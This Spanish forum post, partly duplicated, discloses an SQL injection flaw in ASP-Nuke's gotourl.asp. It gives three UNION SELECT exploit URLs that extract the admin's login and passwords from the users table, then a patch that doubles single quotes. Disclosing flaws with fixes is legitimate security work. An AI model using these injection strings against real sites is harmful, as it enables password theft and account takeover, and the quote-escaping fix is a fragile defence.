C
Cobac
Guest
Bueno hemos descubierto (con alnitak :-*) un fallo en los asp-nuke mediante el cual puedes sacar el password de kien quieras el fallo esta en el archivo addurl-inc.asp que se incluye en el archivo gotourl.asp
y este no revisa las variables que le llegan por lo que puedes hacer una cosa como esta:
esto te dara el nick del admin y lo siguiente su pass:
(te lo da porque ahi he puesto que muestre la primera el password y el login de la primera fecha (udate), y el primero que se crea es el admin )
aunque también puedes sacar el password de cualquier usuario haciendo lo siguiente:
solo tienes que poner el nick de quien quieras sacar el password
Versiones afectadas todas (hasta ahora
)
para solucionar el problema teneis que añadir lo siguiente en el archivo addurl-inc.asp antes de
asi con eso limpias las comillas simples y ya no se puede atacar de esa forma
saludos y a parchear vuestros asp-nuke XDD
P.D.:Tengo que dar las gracias a mek (porque gracias a el y a soportarme se todo lo que se), a alnitak por ayudarme en esto y, especialmente, a jbex por soportarme y dejarme hacer todas estas pruebas
y este no revisa las variables que le llegan por lo que puedes hacer una cosa como esta:
Código:
http://victima.com/gotoURL.asp?url='%20union%20select%20udate,%20ulogin%20FROM%20users%20
esto te dara el nick del admin y lo siguiente su pass:
(te lo da porque ahi he puesto que muestre la primera el password y el login de la primera fecha (udate), y el primero que se crea es el admin )
Código:
http://victima.com/gotoURL.asp?url='%20union%20select%20udate,%20upassword%20FROM%20users%20
aunque también puedes sacar el password de cualquier usuario haciendo lo siguiente:
Código:
http://victima.com/gotoURL.asp?url='%20union%20select%20ulogin='nick',%20upassword%20FROM%20users%20
solo tienes que poner el nick de quien quieras sacar el password
Versiones afectadas todas (hasta ahora
para solucionar el problema teneis que añadir lo siguiente en el archivo addurl-inc.asp antes de
Código:
Set oCn = DBConnexion(DB_MAIN)
Código:
sURL = Trim(sURL)
sURL = Replace(sURL,"'","''")
asi con eso limpias las comillas simples y ya no se puede atacar de esa forma
saludos y a parchear vuestros asp-nuke XDD
P.D.:Tengo que dar las gracias a mek (porque gracias a el y a soportarme se todo lo que se), a alnitak por ayudarme en esto y, especialmente, a jbex por soportarme y dejarme hacer todas estas pruebas